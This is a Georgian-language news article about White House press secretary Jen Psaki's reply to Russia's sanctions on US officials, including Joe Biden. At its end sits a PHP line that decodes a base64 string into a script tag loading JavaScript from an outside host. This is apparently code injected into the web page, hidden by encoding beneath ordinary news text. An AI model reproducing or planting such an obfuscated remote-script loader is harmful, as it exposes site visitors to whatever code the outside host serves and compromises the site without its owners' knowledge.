celsiusi
ავერსი შნაიდერი
 
რუსეთის მიერ, აშშ-ს მაღალი რანგის ოფიციალური პირების წინააღმდეგ დაწესებულ ბოლო სანქციებს გამოეხმაურა თეთრი სახლი. თეთრი სახლის პრეს-მდივანმა ჯენ ფსაკიმ განაცხადა, რომ ეს შეზღუდვები მათ მიზნებზე გავლენას ვერ მოახდენს.
 
"არ გაგიკვირდებათ, რომ არცერთი ჩვენგანი არ გეგმავს ტურისტულ მოგზაურობებს რუსეთში, არცერთ ჩვენგანს არ გვაქვს საბანკო ანგარიშები, რომლებზეც წვდომა არ შეგვეძლება. ასე რომ, ჩვენ წინ წავალთ,"-განაცხადა ჯენ ფსაკიმ.
 
პრესმდივანმა ასევე აღნიშნა, რომ რუსეთის განცხადებაში სანქციების შესახებ, გამოტოვებული იყო, რომ "პრეზიდენტი ბაიდენი არის უმცროსი და სანქციები მათ, შესაძლოა, დაუწესეს მამამისს, მშვიდად განისვენოს".
 
შეგახსენებთ, რომ რუსეთის საგარეო საქმეთა სამინისტრომ განაცხადა, რომ რუსეთმა აშშ-ის პრეზიდენტ ჯო ბაიდენს სანქციები დაუწესა და რუსეთის ტერიტორიაზე შესვლა აუკრძალა. 
860
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");